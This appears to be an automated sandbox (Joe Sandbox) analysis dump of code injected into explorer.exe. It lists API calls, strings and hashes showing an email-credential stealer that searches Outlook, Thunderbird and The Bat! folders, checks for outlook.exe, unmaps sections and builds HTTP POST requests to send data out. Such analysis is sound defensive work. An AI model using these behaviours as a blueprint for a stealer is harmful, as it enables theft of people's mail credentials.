                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000209,?,?,006618F4), ref: 006625E1
                                                                                                                                                                                                                              • PathAppendW.SHLWAPI(00000209,?,?,006618F4), ref: 006625ED
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000209,?,?,006618F4), ref: 00662611
                                                                                                                                                                                                                              • PathAppendW.SHLWAPI(00000209,?,?,006618F4), ref: 0066261D
                                                                                                                                                                                                                              • StrStrIW.SHLWAPI(00000209,?,?,006618F4), ref: 0066262C
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,?,?,006618F4), ref: 00662644
                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000,?,006618F4), ref: 00662653
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_661000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
                                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                                              • API String ID: 1648349226-438819550
                                                                                                                                                                                                                              • Opcode ID: 39361bbe3d48990607cb6858fa0ff7e9e8c36c1c3e0f5366ff50c29c4f7b1d5a
                                                                                                                                                                                                                              • Instruction ID: 0fd88c8b4846a12a305990d02913b9a2d2369e7bc1f060710a4e6fc2a6539a89
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39361bbe3d48990607cb6858fa0ff7e9e8c36c1c3e0f5366ff50c29c4f7b1d5a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA219171204616AFD710AF20DD58DAFBBAEFF95701F00151CF951E2352DB748E0A87A6

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 006627E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00662664,?,006618F4), ref: 006627EF
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0066103A
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00661043
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_661000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                                                                                                                              • String ID: Hqx
                                                                                                                                                                                                                              • API String ID: 1675517319-3912414419
                                                                                                                                                                                                                              • Opcode ID: be3ea2dcd6addecc920ef433a0bc2a6a4954db110b6cf12b4e1c454ac82cfd80
                                                                                                                                                                                                                              • Instruction ID: fe33f55931352a4aa0b0bbb780709be1062052dd732ac0b6e621f571889a8d5a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be3ea2dcd6addecc920ef433a0bc2a6a4954db110b6cf12b4e1c454ac82cfd80
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4D05E31800261B7CFA47774BC1A9CA2A4F9F56330B285219F5659A2D2CDB54A8483B4

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 006629B7: GetProcessHeap.KERNEL32(00000008,00000412,0066257A,006618F4), ref: 006629BA
                                                                                                                                                                                                                                • Part of subcall function 006629B7: RtlAllocateHeap.NTDLL(00000000), ref: 006629C1
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 0066107F
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 00661093
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 006610A7
                                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000,?,?,?,0066104E,?,00661010), ref: 006610BB
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 006610D3
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 006610E7
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 006610FB
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 0066110F
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0066104E,?,00661010), ref: 00661123
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0066116B
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00661189
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_661000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
                                                                                                                                                                                                                              • String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
                                                                                                                                                                                                                              • API String ID: 1709485025-1688604020
                                                                                                                                                                                                                              • Opcode ID: 4b8be8a2b21f62c91d9dd32fa4bf7c3aa6799a4201191e90c1ea41de7b0160fd
                                                                                                                                                                                                                              • Instruction ID: 680055fe201df836566f273ccf35f3f3d9b25ad11394339721b074a44d79cbed
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b8be8a2b21f62c91d9dd32fa4bf7c3aa6799a4201191e90c1ea41de7b0160fd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3318D517402667BEB6133668C26FBF594F9F83B94B090128FA05EE3C2DE558E0186F9

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00662758
                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 00662777
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0066278B
                                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 006627A8
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 006627B3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_661000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                                                                                                                                                                                              • String ID: outlook.exe
                                                                                                                                                                                                                              • API String ID: 868014591-749849299
                                                                                                                                                                                                                              • Opcode ID: 9977786e2a0ded1f7ad64a5217b79d401fa231e9490a4e7cfc8b023f056ee138
                                                                                                                                                                                                                              • Instruction ID: 73169951fa4440d8aa34cbc987b115953d02cf2503935340456723ea9020c6b2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9977786e2a0ded1f7ad64a5217b79d401fa231e9490a4e7cfc8b023f056ee138
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FF09630901539EBD720AB74DC49FEA7B7EDB19721F000190E849E2391DB749F9D4A91

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 91 669cf6-669d10 92 669d15 91->92 93 669d16-669d28 92->93 95 669d8e-669d8f 93->95 96 669d2a 93->96 97 669d90-669d95 95->97 98 669caf-669cbd 96->98 99 669d2c-669d36 96->99 100 669d96-669d98 97->100 101 669cd1-669cf4 98->101 102 669cbf-669cce 98->102 99->92 103 669d38-669d43 99->103 104 669da1 100->104 105 669d9a-669d9f 100->105 101->91 102->101 106 669d44-669d4c 103->106 104->97 107 669da3 104->107 105->104 106->106 108 669d4e-669d50 106->108 109 669da8-669daa 107->109 110 669d52-669d55 108->110 111 669d79-669d88 108->111 112 669db3-669db7 109->112 113 669dac-669db1 109->113 110->93 114 669d57-669d75 110->114 111->95 111->105 112->109 117 669db9 112->117 113->112 115 669f3d 114->115 116 669d7b-669d88 114->116 115->115 116->105 118 669dc4-669dc9 117->118 119 669dbb-669dc2 117->119 120 669dcb-669dd4 118->120 121 669dd8-669dda 118->121 119->109 119->118 124 669dd6 120->124 125 669e4a-669e4d 120->125 122 669de3-669de7 121->122 123 669ddc-669de1 121->123 126 669df0-669df2 122->126 127 669de9-669dee 122->127 123->122 124->121 128 669e52-669e55 125->128 129 669e14-669e23 126->129 130 669df4 126->130 127->126 131 669e57-669e59 128->131 134 669e34-669e41 129->134 135 669e25-669e2c 129->135 133 669df5-669df7 130->133 131->128 132 669e5b-669e5e 131->132 132->128 136 669e60-669e7c 132->136 137 669e00-669e04 133->137 138 669df9-669dfe 133->138 134->134 139 669e43-669e45 134->139 135->135 140 669e2e 135->140 136->131 141 669e7e 136->141 137->133 142 669e06 137->142 138->137 139->100 140->100 143 669e84-669e88 141->143 144 669e11 142->144 145 669e08-669e0f 142->145 146 669ecf-669ed2 143->146 147 669e8a-669ea0 143->147 144->129 145->133 145->144 148 669ed5-669edc 146->148 155 669ea1-669ea6 147->155 149 669f00-669f30 VirtualProtect * 2 148->149 150 669ede-669ee0 148->150 154 669f34-669f38 149->154 152 669ee2-669ef1 150->152 153 669ef3-669efe 150->153 152->148 153->152 154->154 156 669f3a 154->156 155->143 157 669ea8-669eaa 155->157 156->115 158 669eb3-669ec0 157->158 159 669eac-669eb2 157->159 161 669ec2-669ec7 158->161 162 669ec9-669ecc 158->162 159->158 161->155
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000013.00000002.2396956156.0000000000668000.00000040.80000000.00040000.00000000.sdmp, Offset: 00668000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_668000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2bf3e10bcdb0ce4becbc58a95c86dc048c44c40681fc49bf0e49dd48e0d385cf
                                                                                                                                                                                                                              • Instruction ID: f3a2a1c5b3b803782a9b25796426ddb797245ba676885a3a59c54a6d0d01e423
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bf3e10bcdb0ce4becbc58a95c86dc048c44c40681fc49bf0e49dd48e0d385cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F19148725097914FD7169E74CC806E5BBAAEF52320B2C06B9CCD1CB386E775580AC7B0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 163 6629b7-6629c7 GetProcessHeap RtlAllocateHeap
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000412,0066257A,006618F4), ref: 006629BA
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 006629C1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_661000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                                                                                                              • Opcode ID: 07ef76f5cf470c0407764c26d72dccce96ab9e8ad3216726b3faa302a424fc6d
                                                                                                                                                                                                                              • Instruction ID: fc1d4625db7cefe8e4801a9063dbb292b2e3877df830ed3be41c5f9ad6b19290
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07ef76f5cf470c0407764c26d72dccce96ab9e8ad3216726b3faa302a424fc6d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AA002B15502107BDF4457B5AE1DA157539A745701F005544F3458515499E455488721

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 171 6620a7-662102 call 662415 call 6629b7 call 662938 call 6624cc 180 662104-66211b 171->180 181 66211d-662129 171->181 184 66212d-66212f 180->184 181->184 185 662135-66216c RtlZeroMemory 184->185 186 662403-662412 call 662999 184->186 190 662172-66218d 185->190 191 6623fb-662402 185->191 192 6621bf-6621d1 190->192 193 66218f-6621a0 call 66243d 190->193 191->186 198 6621d5-6621d7 192->198 199 6621a2-6621b1 193->199 200 6621b3 193->200 201 6621dd-662239 call 662866 198->201 202 6623e8-6623ee 198->202 203 6621b5-6621bd 199->203 200->203 211 6623e1 201->211 212 66223f-662244 201->212 206 6623f7 202->206 207 6623f0-6623f2 call 662999 202->207 203->198 206->191 207->206 211->202 213 662246-662257 212->213 214 66225e-66228c call 6629b7 wsprintfW 212->214 213->214 217 6622a5-6622bc 214->217 218 66228e-662290 214->218 224 6622be-6622f4 call 6629b7 wsprintfW 217->224 225 6622fb-662315 217->225 219 662291-662294 218->219 220 662296-66229b 219->220 221 66229f-6622a1 219->221 220->219 223 66229d 220->223 221->217 223->217 224->225 229 6623be-6623d4 call 662999 225->229 230 66231b-66232e 225->230 238 6623d6-6623d8 call 662999 229->238 239 6623dd 229->239 230->229 233 662334-66234a call 6629b7 230->233 240 66234c-662357 233->240 238->239 239->211 242 66236b-662382 240->242 243 662359-662366 call 66297c 240->243 247 662386-662393 242->247 248 662384 242->248 243->242 247->240 249 662395-662399 247->249 248->247 250 6623b3-6623ba call 662999 249->250 251 66239b 249->251 250->229 253 66239b call 66296b 251->253 254 6623a0-6623ad RtlMoveMemory 253->254 254->250
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 006629B7: GetProcessHeap.KERNEL32(00000008,00000412,0066257A,006618F4), ref: 006629BA
                                                                                                                                                                                                                                • Part of subcall function 006629B7: RtlAllocateHeap.NTDLL(00000000), ref: 006629C1
                                                                                                                                                                                                                                • Part of subcall function 00662938: lstrlen.KERNEL32(00787116,?,00000000,00000000,006620E3,74DE8A60,00787116,00000000), ref: 00662940
                                                                                                                                                                                                                                • Part of subcall function 00662938: MultiByteToWideChar.KERNEL32(00000000,00000000,00787116,00000001,00000000,00000000), ref: 00662952
                                                                                                                                                                                                                                • Part of subcall function 006624CC: RtlZeroMemory.NTDLL(?,00000018), ref: 006624DE
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(?,0000003C), ref: 0066213F
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00662278
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 006622E3
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 006623AD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_661000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                                                                                                              • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$Hqx$POST
                                                                                                                                                                                                                              • API String ID: 4204651544-3472570425
                                                                                                                                                                                                                              • Opcode ID: ebe1a1eb608a1172e824dc54255a4363b2c165d5f99a6a001e84cacd8c6e294f
                                                                                                                                                                                                                              • Instruction ID: 4368d22048320f21580f456014ff57030b9d7c9163037f027f9f739d484d579a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebe1a1eb608a1172e824dc54255a4363b2c165d5f99a6a001e84cacd8c6e294f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6A19B71608752AFD310DF69D894A6BBBEAEF88340F04092DF985D7351DB74DE088B52

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 256 661ece-661eec StrStrIA 257 661ef5-661f35 RtlMoveMemory * 2 StrStrIA 256->257 258 661eee-661ef0 256->258 260 661fa7 257->260 261 661f37-661f48 StrStrIA 257->261 259 661fab-661fb3 258->259 262 661fa9-661faa 260->262 261->260 263 661f4a-661f5b StrStrIA 261->263 262->259 263->260 264 661f5d-661f68 lstrlen 263->264 265 661fa3-661fa5 264->265 266 661f6a 264->266 265->262 267 661f6c-661f78 call 661ffb 266->267 270 661f7a-661f80 267->270 271 661f9b-661fa1 lstrlen 267->271 272 661f87-661f8a 270->272 273 661f82-661f85 270->273 271->265 271->267 272->271 274 661f8c-661f8f 272->274 273->271 273->272 274->271 275 661f91-661f94 274->275 275->271 276 661f96-661f99 275->276 276->260 276->271
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,006631D8,00000000,007874B8), ref: 00661EE4
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(?,?,00000000), ref: 00661F08
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(?,?,00000100), ref: 00661F22
                                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 00661F31
                                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 00661F44
                                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?,?,00000000), ref: 00661F57
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,00000000), ref: 00661F64
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,00000000), ref: 00661F9D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_661000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MemoryMovelstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 456560858-0
                                                                                                                                                                                                                              • Opcode ID: d6bf339a257f7588ee98439fcea14f8211f451a0b39ef6cd38eba0888bc89616
                                                                                                                                                                                                                              • Instruction ID: 90c404f9b3ca96d4b018c0210f54d5a80d525065047604d428bc08076a004a16
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6bf339a257f7588ee98439fcea14f8211f451a0b39ef6cd38eba0888bc89616
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D21C872504319AAD730EE64DC85EEB77EE9B87340F094D26F940C7211D739D94E86A2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 292 661e44-661e59 293 661e5b-661e73 lstrlen CharLowerBuffA 292->293 294 661ec8-661ecd 292->294 295 661e75-661e7b 293->295 296 661e9d-661eaa call 6626fc 293->296 298 661e7f-661e89 lstrcmpiA 295->298 300 661ec7 296->300 302 661eac-661eb5 call 661ece 296->302 298->300 301 661e8b-661e9b 298->301 300->294 301->296 301->298 302->300 305 661eb7-66267d 302->305 307 66267f-662688 305->307 308 6626a9-6626ab 305->308 309 662692-6626a8 lstrlen RtlMoveMemory 307->309 310 66268a-662690 307->310 309->308 310->309
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,00661BF4), ref: 00661E5D
                                                                                                                                                                                                                              • CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,00661BF4), ref: 00661E69
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,0078845C), ref: 00661E81
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000), ref: 00662699
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(0078845C,?,00000000), ref: 006626A2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_661000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2826435453-0
                                                                                                                                                                                                                              • Opcode ID: 0c6720ec125262a72eef41c1c0a62d3c2fc1ae01d10e1d4042509a17e07b3a2b
                                                                                                                                                                                                                              • Instruction ID: 4f135fe64b634edc6ded3c1225de0598a18904a5b0fa7cbcd629c4ce9f6e71b9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c6720ec125262a72eef41c1c0a62d3c2fc1ae01d10e1d4042509a17e07b3a2b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921F6B6A006205FD7109F24EC849BA77AFEF8A311B14042EFC15CB341D7B2D90687A1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 311 661e3e-661e59 312 661e5b-661e73 lstrlen CharLowerBuffA 311->312 313 661ec8-661ecd 311->313 314 661e75-661e7b 312->314 315 661e9d-661eaa call 6626fc 312->315 317 661e7f-661e89 lstrcmpiA 314->317 319 661ec7 315->319 321 661eac-661eb5 call 661ece 315->321 317->319 320 661e8b-661e9b 317->320 319->313 320->315 320->317 321->319 324 661eb7-66267d 321->324 326 66267f-662688 324->326 327 6626a9-6626ab 324->327 328 662692-6626a8 lstrlen RtlMoveMemory 326->328 329 66268a-662690 326->329 328->327 329->328
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,00661BF4), ref: 00661E5D
                                                                                                                                                                                                                              • CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,00661BF4), ref: 00661E69
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,0078845C), ref: 00661E81
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000), ref: 00662699
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(0078845C,?,00000000), ref: 006626A2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_661000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2826435453-0
                                                                                                                                                                                                                              • Opcode ID: 2f8bf426c1f4ffcf83e5dfa97856cec85791a1108cd402b97d93055471d02434
                                                                                                                                                                                                                              • Instruction ID: 39ea203c930d5e8d9e8c284195d47034c925690dc78c1ac48e9b2e7d2676b12f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f8bf426c1f4ffcf83e5dfa97856cec85791a1108cd402b97d93055471d02434
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3521C376A006219FD710DF24EC849AA7BEFEF8A314B04046AEC55DB351C7B2D90A87A1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 330 662013-662027 331 662036-662071 call 6629b7 lstrcat 330->331 332 662029-662032 lstrlen 330->332 335 662073-662078 lstrcat 331->335 336 66207a-6620a4 call 6620a7 call 662999 331->336 332->331 335->336
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000208,00787116,00661FDE,?,?,00000000,00000001,00000000,00000000,00000000,00661186), ref: 0066202A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000002,00787143), ref: 0066205C
                                                                                                                                                                                                                              • lstrcat.KERNEL32(0000004E,?), ref: 00662078
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_661000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$lstrlen
                                                                                                                                                                                                                              • String ID: Hqx
                                                                                                                                                                                                                              • API String ID: 751011610-3912414419
                                                                                                                                                                                                                              • Opcode ID: 7e5fc4263516c56c0cf4b4d8bcee61cd3b6494798a924c1c03afda3e1c8204fd
                                                                                                                                                                                                                              • Instruction ID: bec311f852ad9083b224a45c06ae29005681fdd05213bcc45a501cc99a11112b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e5fc4263516c56c0cf4b4d8bcee61cd3b6494798a924c1c03afda3e1c8204fd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0711A3726043119FC728CF18D894A6B77EAEF88755F00062EF94987346E775EC04CBA4

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 341 6618f4-661917 CreateFileW 342 66196d-66196f 341->342 343 661919-661927 GetFileSize 341->343 344 661965-66196c CloseHandle 343->344 345 661929-66192b 343->345 344->342 345->344 346 66192d-661949 call 6629b7 ReadFile 345->346 349 66195d-661964 call 662999 346->349 350 66194b-661958 call 661c39 call 661972 346->350 349->344 350->349
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0066190C
                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0066191C
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00661966
                                                                                                                                                                                                                                • Part of subcall function 006629B7: GetProcessHeap.KERNEL32(00000008,00000412,0066257A,006618F4), ref: 006629BA
                                                                                                                                                                                                                                • Part of subcall function 006629B7: RtlAllocateHeap.NTDLL(00000000), ref: 006629C1
                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00661941
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000013.00000002.2396956156.0000000000661000.00000040.80000000.00040000.00000000.sdmp, Offset: 00661000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_661000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2517252058-0
                                                                                                                                                                                                                              • Opcode ID: 29cd7a382dc0e0c8bb8c357e20c31d2f765ca23b02db43a67f4a75dc08ae2e2b
                                                                                                                                                                                                                              • Instruction ID: fce72f2eb23353e19cae09029d595932207d396d4989cd7232d7061fc7907cc1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29cd7a382dc0e0c8bb8c357e20c31d2f765ca23b02db43a67f4a75dc08ae2e2b
